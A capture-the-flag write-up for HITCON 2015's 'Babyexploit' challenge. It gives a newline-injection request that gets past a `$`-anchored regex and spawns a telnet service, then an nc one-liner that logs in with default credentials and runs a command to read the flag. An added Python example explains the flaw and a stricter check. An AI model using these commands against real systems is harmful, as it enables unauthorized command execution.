HITCON 2015 Quals: Babyexploit


This challenge was solved by one of my teammates, nguyen, and me; the write-up was written by me.

Run this on one thread:

while true; do wget -qO- "http://52.68.245.164/?args[]=abc%0a&args[]=twistd&args[]=telnet" > /dev/null; done

This works because $ in a regex also matches just before a trailing \n (\Z would not allow this), so the newline-terminated argument passes validation and the following commands are run:

/bin/orange abc
twistd telnet
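
The anchor behaviour described above, shown from the validation side as an added example (not code from the challenge or from the original write-up). The `\w+` allowlist pattern and the space-joined shell string are assumptions; the semantics shown are those of Python's `re` module.

```python
import re

# Constructed sample: the decoded args[] values from the request above.
SAMPLE_ARGS = ["abc\n", "twistd", "telnet"]

WEAK = re.compile(r"^\w+$")      # `$` also matches just before one trailing "\n"
STRICT = re.compile(r"^\w+\Z")   # Python's `\Z` matches only at the very end


def weak_ok(arg):
    return WEAK.match(arg) is not None


def strict_ok(arg):
    # Equivalent alternative: re.fullmatch(r"\w+", arg)
    return STRICT.match(arg) is not None


def shell_lines(args, check, prog="/bin/orange"):
    """Return the command lines a shell would see, or None if any arg is rejected.

    Assumption: the wrapper space-joins the arguments into one shell string.
    """
    if not all(check(a) for a in args):
        return None
    joined = prog + " " + " ".join(args)
    # A shell treats each newline as a command separator.
    return [line.strip() for line in joined.splitlines()]


def safe_argv(args, prog="/bin/orange"):
    """Hardened form: strict validation, then an argv list for a no-shell exec."""
    bad = [a for a in args if not strict_ok(a)]
    if bad:
        raise ValueError("rejected arguments: %r" % bad)
    return [prog] + list(args)


if __name__ == "__main__":
    print("weak  :", shell_lines(SAMPLE_ARGS, weak_ok))
    print("strict:", shell_lines(SAMPLE_ARGS, strict_ok))
```

In PCRE-based engines (PHP, Perl) `\Z` also accepts a trailing newline; the strict end anchor there is lowercase `\z`.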

Connect on another thread: nc 52.68.245.164 4040 (this is the port of the twistd telnet service), user/pass: admin/changeme (default credentials), and execute this until you get the flag: import os;print os.popen("/read_flag").read();

python -c "import sys;sys.stdout.write(\"admin\r\nchangeme\r\nimport os;print '%r'%os.popen('/read_flag').read();\r\n\")"|nc 52.68.245.164 4040

Sometimes you have to try it multiple times, because the process is killed very fast.
